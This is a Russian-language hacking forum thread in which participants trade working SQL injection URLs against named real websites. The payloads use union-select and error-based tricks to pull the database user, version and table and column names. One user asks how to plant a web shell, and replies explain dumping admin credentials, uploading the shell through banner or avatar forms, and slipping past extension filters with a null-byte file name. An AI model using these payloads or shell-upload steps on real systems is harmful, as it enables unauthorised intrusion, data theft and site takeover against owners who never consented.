Code: Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/valesby/data/www/vales.by/common/common_scripts.php on line 26 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near [B]'@localhost:valesby[/B]:5.0.90' at line 4 Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/valesby/data/www/vales.by/catalog.php on line 155 The used SELECT statements have a different number of columns Здесь просто имя юзера после локалхост пишет.
Улыбнуло Поясню: на странице идет два запроса. В первом - SQL-инъекция, дальше идет второй запрос, в котором используются данные от первого. MySQL ругается на символ '@', поэтому показывает только от этого символа. Делаем запрос: Code: http://www.vales.by/catalog.php?action=show_object&id=109+union+select+hex(concat_ws(0x3a,user(),database(),version())) Получаем: Code: 76616C65736279406C6F63616C686F73743A76616C657362793A352E302E3930 Что в HEX: Code: valesby@localhost:valesby:5.0.90 Тоесть Code: имя_юзера:БД:версия Проявляем смекалку и нестандартное мышление, товарищи...
2 mailbrush: Code: http://www.vales.by/catalog.php?action=show_object&id=(select+1+from+(select+count(0),concat((select+user()),floor(rand(0)*2))+from+information_schema.tables+group+by+2)a)
Потому что ua_menu_item1, - единица вставляется от условия для ошибки дублей. Да и вообще, зачем эта гора урла, когда можно просто.. Code: http://www.zed.ua/en/index.php?id=1+or(1,1)=(select(count(0)),concat((select(column_name)from(information_schema.columns(where)table_name=0x75615f6d656e755f6974656d)limit+0,1),floor(rand(0)*2))from(information_schema.tables)GROUP+BY+2)
нет.. Code: http://diktatu.net/index.php?id=-1+union+select+1,2,%28select+concat%280x7e,0x27,group_concat%28table_name%29,0x27,0x7e%29+from+information_schema.tables+Where+table_schema=0x64696B74617430305F64696B74617475%29--
Code: http://www.zed.ua/en/index.php?id=(select+1+from+(select+count(0),concat((select+column_name+from+information_schema.columns+where+table_name=0x75615f6d656e755f6974656d+limit+0,1),floor(rand(0)*2))+from+information_schema.columns+group+by+2+limit+0,1)a)
2 Ctacok: Ну тогда еще объясни плз нахрена вы всегда перед -- плюсик ставите, это что, магия какая-то особенная? ))
Хоть ты мне и писал как-то давно что не обязательно, но уж от привычки сложно отказаться, да и рука сама тянеться, и не всегда кстате срабатывает без +--+, ну ты понел.
Знаю уже задолбал своими вопросами, но кому не трудно ответьте. Вопрос состоит в том, как залить шелл? Вот есть у меня скуля: . Напишите как можно залить сюда шелл. И скажите после заливки шелла я смогу полностью менять исходник страницы и т.д.? Пробовал делать как написано в статье "SQL injection полный FAQ", но что-то не получается
покажи как делал. достаешь из базы пасс и логин от админки - заходишь и там смотришь по обстоятельствам.
CyberHunter, шелл ты сможешь залить через админку, фтп или исполнить инклуд. Думаю, что в твоем случае нужно раскрутить твою скулю до вида логин;пароль. После того, как зайдешь в админку, шелл сможешь залить, анпример, через систему баннеров, аватаров и т.д. Если сервер не захочет исполнять пхп файл, сделай расширение, например .php.jpg%00 (с нулевым байтом)
